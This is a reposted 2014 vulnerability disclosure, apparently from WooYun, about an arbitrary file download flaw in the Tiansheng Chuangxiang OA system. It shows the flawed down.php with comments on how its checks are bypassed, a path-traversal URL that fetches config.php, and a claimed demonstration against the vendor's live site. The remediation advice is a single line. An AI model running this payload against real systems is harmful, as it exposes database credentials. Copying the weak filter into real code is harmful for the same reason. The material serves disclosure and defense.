记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

天生创想OA系统任意文件下载+官网数据库配置文件

2014-05-19 05:05

天生创想OA系统 V2014

QQ截图20140216153659.jpg



乌云之前报过的 WooYun: 天生创想OA系统任意文件下载

新版的down.php代码加了两个限制

<?php

//下载文件

define('IN_ADMIN',True);

require_once('include/common.php');

get_login($_USER->id);

$filename=$_GET['urls'];

$phps=explode('/',$filename);

if($phps[0]!='data' && $phps[0]!='ntko'){ //以data或者ntko开头可以绕过

echo '下载失败!';

exit;

}

$phps1=explode('.',$filename);

if($phps1[1]=='php'){ //这个判断有逻辑问题,分割后第二个值不为php即可

echo '下载失败,请不要非法下载!';

exit;

}

header("Content-Type: application/force-download");

header("Content-Disposition: attachment; filename=".basename($filename));

readfile($filename);

?>



通过该文件很容易构造出任意文件

例如下载数据库配置文件http://网站地址/down.php?urls=data/../config.php

漏洞证明:

官网数据库配置文件(PS:官网测试帐号登陆后)

http://oa.515158.com//down.php?urls=data/../config.php

QQ截图20140217191936.jpg

修复方案:

过滤要加强

知识来源: www.wooyun.org/bugs/wooyun-2014-051213

阅读:74523 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“天生创想OA系统任意文件下载+官网数据库配置文件”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云